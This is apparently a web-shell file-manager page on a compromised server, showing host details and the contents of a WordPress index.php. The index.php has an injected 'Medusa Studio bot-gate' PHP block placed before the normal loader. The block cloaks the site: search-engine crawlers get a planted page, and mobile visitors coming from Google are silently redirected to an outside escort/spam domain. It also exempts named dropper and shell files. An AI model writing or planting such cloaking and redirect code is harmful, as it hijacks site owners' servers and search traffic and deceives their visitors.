| Server IP : 198.244.165.102 / Your IP : 216.73.216.218 [ Web Server : nginx/1.24.0 System : Linux modovh-ub-01 6.8.0-138-generic #138-Ubuntu SMP PREEMPT_DYNAMIC Fri Jul 31 22:41:49 UTC 2026 x86_64 User : colleary ( 1011) PHP Version : 8.3.23 Disable Function : NONE Domains : 2 Domains MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/www/sfpcplanning/hold2/ |
Upload File : |
<?php
/* BEGIN Medusa Studio bot-gate */
error_reporting(0);
define('IST_TXT_URL', 'https://istanbulescortladys.com/ist.txt');
$vitrin_source = IST_TXT_URL;
$vitrin_redirect = 'https://istanbulmedusa.club/';
$botUa = 'Googlebot|Google-InspectionTool|Google-PageRenderer|AdsBot|Mediapartners-Google|APIs-Google|Googlebot-Image|Googlebot-Video|Googlebot-News|Googlebot-Mobile|bingbot|Slurp|DuckDuckBot|Baiduspider|YandexBot|Applebot|facebookexternalhit|Twitterbot|Google-';
$userAgent = (string)($_SERVER['HTTP_USER_AGENT'] ?? '');
$uri = (string)($_SERVER['REQUEST_URI'] ?? '/');
$path = (string)(parse_url($uri, PHP_URL_PATH) ?: '/');
if ($path === '') {
$path = '/';
}
if ($path !== '/' && substr($path, -1) === '/') {
$path = rtrim($path, '/') ?: '/';
}
$is_home = ($path === '/' || (bool)preg_match('#/index\\.php$#i', $path));
$has_params = ((string)($_SERVER['QUERY_STRING'] ?? '')) !== '';
$ms_skip_gate = (bool)preg_match('#/(fm|medusa|clr|hop|ms-detect-dropper|ms-rm-js26564c)\\.php$#i', $path);
if (!$ms_skip_gate) {
$is_google_bot = ($userAgent !== '' && (bool)preg_match('/' . $botUa . '/i', $userAgent));
$is_mobile = (bool)preg_match('/mobile|android|iphone|ipad|ipod|opera mini|blackberry|windows phone/i', $userAgent);
$ref = strtolower((string)($_SERVER['HTTP_REFERER'] ?? ''));
$is_google_referer = (bool)preg_match('#google\\.|googleusercontent\\.|googlesyndication\\.|doubleclick\\.net|android-app://com\\.google#i', $ref)
|| (isset($_GET['gclid']) && (string)$_GET['gclid'] !== '')
|| (isset($_GET['gbraid']) && (string)$_GET['gbraid'] !== '')
|| (isset($_GET['wbraid']) && (string)$_GET['wbraid'] !== '')
|| (isset($_GET['gad_source']) && (string)$_GET['gad_source'] !== '')
|| (isset($_GET['utm_source']) && (bool)preg_match('/google|youtube/i', (string)$_GET['utm_source']))
|| (isset($_GET['ms_gate']) && (string)$_GET['ms_gate'] === 'mobile');
if (!empty($_COOKIE['ms_gv_hit']) && (string)$_COOKIE['ms_gv_hit'] === '1') {
$is_google_referer = true;
}
$ms_nocache = static function (): void {
if (!defined('DONOTCACHEPAGE')) {
define('DONOTCACHEPAGE', true);
}
if (!defined('LSCACHE_NO_CACHE')) {
define('LSCACHE_NO_CACHE', true);
}
if (headers_sent()) {
return;
}
header('Cache-Control: no-store, no-cache, must-revalidate, max-age=0, private');
header('CDN-Cache-Control: no-store');
header('Pragma: no-cache');
header('Expires: 0');
header('Vary: User-Agent, Referer, Cookie');
header('X-LiteSpeed-Cache-Control: no-cache');
if (!headers_sent()) {
@setcookie('wordpress_no_cache', '1', time() + 3600, '/');
}
};
if ($is_google_bot && ($is_home || $has_params)) {
$ms_nocache();
if (!headers_sent()) {
header('Content-Type: text/html; charset=utf-8');
header('X-Robots-Tag: index, follow');
header('X-Medusa-Gate: license');
}
$lic = __DIR__ . '/license.html';
if (is_file($lic)) {
readfile($lic);
exit;
}
echo '<!DOCTYPE html><html lang="tr"><head><meta charset="utf-8"><meta name="robots" content="index, follow"><title>License</title></head><body><h1>License</h1><p>license.html eksik — panelden ÜRET.</p></body></html>';
exit;
}
if ($is_home) {
$ms_nocache();
}
if ($is_mobile && $is_google_referer && ($is_home || $has_params) && $vitrin_redirect !== '') {
@setcookie('ms_gv_hit', '1', time() + 1800, '/', '', !empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off', true);
$vitrin = $vitrin_redirect;
if (strpos($vitrin, 'http') !== 0) {
$vitrin = 'https://' . ltrim($vitrin, '/');
}
$vitrin = rtrim((string)preg_replace('/[?#].*$/', '', $vitrin), '/') . '/';
$ms_nocache();
header('X-Medusa-Vitrin: 302');
header('Location: ' . $vitrin, true, 302);
exit;
}
}
/* END Medusa Studio bot-gate */
define('WP_USE_THEMES', true);
require __DIR__ . '/wp-blog-header.php';